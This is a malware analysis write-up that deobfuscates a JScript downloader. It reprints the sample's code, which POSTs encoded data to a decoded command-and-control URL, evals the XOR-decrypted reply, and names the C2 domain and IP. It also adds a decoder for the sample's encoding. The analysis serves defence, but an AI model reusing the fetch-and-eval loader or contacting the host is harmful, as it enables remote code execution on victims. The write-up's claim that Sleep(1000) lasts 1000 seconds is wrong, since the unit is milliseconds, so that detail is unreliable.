A Malware Analysis on a file I found in the wild.
https://www.virustotal.com/gui/file-analysis/MTY0YThhNmFlN2E1NTY1N2VjMTRkMzMzMjI3ZjQ1Mzc6MTY3NDQ5MTU1NQ==
Please note that this is a live sample of malware and should be handled with care.
Entry Code
var url = vfiranoz.garnacizig('mstuy.jyvlqiymsaffp-nljllihha.vnzepxa.e4ddqdm9o4s1n3o7j/t/y:qsnpktqtqha')+vfiranoz.garnacizig('tgxnqpa.aluevxeiypp/g');
var nepdu = ['a', '501'];
nepdu.push('263');
vfiranoz.xaspujxy();
var spediafna8 = request(nepdu);
this['eval'](spediafna8);
I renamed nepdu to arguments.
var arguments = ['a', '501', '263']
xaspujxy : function () {
    var uxoxkah = vfiranoz.pevybvu();
    var uhsnamoz = uxoxkah + 10000;
    while (uxoxkah < uhsnamoz) {
        uxoxkah = vfiranoz.pevybvu();
        vfiranoz.sitxogi();
    }
},
Variable uxoxkah is set to the return value of pevybvu().
pevybvu : function () {
    return (new Date)['getTime']();
},
I renamed pevybvu to getTime() and uxoxkah to currentTime.
sitxogi : function () {
    var coyb = 'Sleep';
    WScript[coyb](1000);
},
This function is calling Sleep() for 1000 seconds. I renamed sitxogi to SleepFor1000Seconds(). I also removed the unnecessary variable declaration.
The time returned by getTime() is then added to 10000; I renamed this variable from uhsnamoz to waitPeriod.
The function then sleeps in a loop until currentTime reaches waitPeriod. I renamed the function xaspujxy to wait.
function request(nypzpa) {
    var cmumavhpa = Malware.aczeg(Malware.izwgesil(nypzpa));
    return Malware.qyap(cmumavhpa);
}
I renamed nypzpa to args. This function seems to be making a network request.
izwgesil : function (args) {
    var qyphneax = '';
    for (var nadhon8 = 0; nadhon8 < args['length']; nadhon8++) {
        if (args[nadhon8][0]) {
            qyphneax += args[nadhon8][0] + '=' + encodeURIComponent(''+args[nadhon8][1]) + '&';
        } else {
            qyphneax += nadhon8 + '=' + encodeURIComponent(''+args[nadhon8]) + '&';
        }
    }
    return Malware.napo(qyphneax);
},
The encodeURIComponent() function encodes a URI by replacing each instance of certain characters by one, two, three, or four escape sequences representing the UTF-8 encoding of the character (will only be four escape sequences for characters composed of two "surrogate" characters).
This function seems to be generating the URL. I renamed nadhon8 to i and qyphneax to finalString.
napo : function (rucuzwalrow) {
    var ukleq = 151;
    var ypjacxy = Malware.mwypko(ukleq);
    for (var nadhon8 = 0; nadhon8 < rucuzwalrow['length']; nadhon8++) {
        ypjacxy += Malware.mwypko(rucuzwalrow['charCodeAt'](nadhon8) ^ ukleq);
    }
    return ypjacxy;
},
Immediately the function mwypko is being called and ukleq (151) is being passed into it. I renamed ukleq to num and nadhon8 to i.
mwypko : function (num) {
    var ijiv = '00';
    var kokuwut = ijiv + num['toString'](16);
    return kokuwut['substr'](kokuwut['length'] - 2);
},
When I run and compile the code above, it returns 97. I renamed this function to calcChar. I renamed ypjacxy in napo to chars.
Let's try to compile what we gathered so far.
Hmmm, looks like some type of hash? This hash is then passed to aczeg().
aczeg : function (hash) {
    try {
        var leczu;
        leczu = new ActiveXObject('MSXML2.XMLHTTP');
        leczu['open']('POST', url, false);
        leczu['send'](hash);
        return leczu['responseText'];
    } catch (e) {}
}
This function seems to be sending a POST request to the URL.
var url = Malware.garnacizig('mstuy.jyvlqiymsaffp-nljllihha.vnzepxa.e4ddqdm9o4s1n3o7j/t/y:qsnpktqtqha')+Malware.garnacizig('tgxnqpa.aluevxeiypp/g');
This long text is passed into the function garnacizig().
garnacizig : function (emblaol) {
    var zruyqop = '';
    for (var adqzieszek = 0; adqzieszek < emblaol['length']; adqzieszek++) {
        if (adqzieszek % 2) {
            zruyqop = emblaol['substr'](adqzieszek, 1) + zruyqop;
        }
    }
    return zruyqop;
},
I renamed emblaol to url, adqzieszek to i, zruyqop to generatedUrl and garnacizig to generateURL. Let's try to compile what we gathered so far.
Aha! We located a URL.
https://urlscan.io/result/b2cb2fca-b753-41a4-9390-965f31bb3d59/
This website contacted 1 IPs in 1 countries across 1 domains to perform 1 HTTP transactions. The main IP is 87.249.50.201, located in Russian Federation and belongs to ARTNET2, PL. The main domain is bd5447b0.xen.hill-family.us.
TLS certificate: Issued by ZeroSSL RSA Domain Secure Site CA on November 27th 2021. Valid for: 3 months.
The result of this request is then passed to qyap().
qyap : function (request) {
    if (!request) return '';
    var ukleq = parseInt(request['substr'](0, 2), 16);
    var cawpahowa = request['substr'](2);
    var ypjacxy = '';
    for (var nadhon8 = 0; nadhon8 < cawpahowa['length']; nadhon8 += 2) {
        ypjacxy += String['fromCharCode'](parseInt(cawpahowa['substr'](nadhon8, 2), 16) ^ ukleq);
    }
    return ypjacxy;
},
This function seems to decrypt the specified request.
Finally, the commands in the request are run. At the time of updating this report the domain is down, so I was unable to grab the commands.
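The four encoding routines walked through above (garnacizig, izwgesil, napo/mwypko and qyap) reimplemented as a stand-alone decoder, so the two obfuscated literals from the entry code and any captured response body can be decoded offline without running the sample. This is an added example, not code from the sample or the write-up; the function names are mine, the constants and literals are the sample's.

```javascript
// Added example, not the sample's or the write-up's code: the sample's encoding
// primitives with readable names (names are mine, constants are the sample's).

// garnacizig(): the real string is stored reversed with a junk character before
// every real character, so the payload sits at the odd indexes.
function decodeInterleaved(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    if (i % 2) out = s[i] + out; // odd index: real char, prepend to reverse
  }
  return out;
}

// izwgesil(): the POST body. Each element of the sample's argument array is a
// string, so element[0] is its first character and element[1] its second.
function buildBody(args) {
  let q = "";
  for (let i = 0; i < args.length; i++) {
    if (args[i][0]) q += args[i][0] + "=" + encodeURIComponent("" + args[i][1]) + "&";
    else q += i + "=" + encodeURIComponent("" + args[i]) + "&";
  }
  return q;
}

// mwypko(): one byte as two lowercase hex digits.
function hex2(n) { return ("00" + n.toString(16)).slice(-2); }

// napo(): key byte in hex, then each character XORed with the key, in hex.
// 151 (0x97) is the key hard-coded in the sample.
function xorHexEncode(plain, key = 151) {
  let out = hex2(key);
  for (let i = 0; i < plain.length; i++) out += hex2(plain.charCodeAt(i) ^ key);
  return out;
}

// qyap(): the inverse, reading the key from the first two hex digits. This is
// what to run over a response body recovered from a proxy log or pcap.
function xorHexDecode(body) {
  if (!body) return "";
  const key = parseInt(body.slice(0, 2), 16);
  let out = "";
  for (let i = 2; i < body.length; i += 2) {
    out += String.fromCharCode(parseInt(body.slice(i, i + 2), 16) ^ key);
  }
  return out;
}

// The two literals from the sample's entry code, decoded and joined.
function decodeC2Url() {
  return decodeInterleaved("mstuy.jyvlqiymsaffp-nljllihha.vnzepxa.e4ddqdm9o4s1n3o7j/t/y:qsnpktqtqha")
       + decodeInterleaved("tgxnqpa.aluevxeiypp/g");
}
```

Calling decodeC2Url() yields the full request URL, and buildBody(['a', '501', '263']) shows the plaintext that napo turns into the "hash" seen above.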
this['eval'](spediafna8);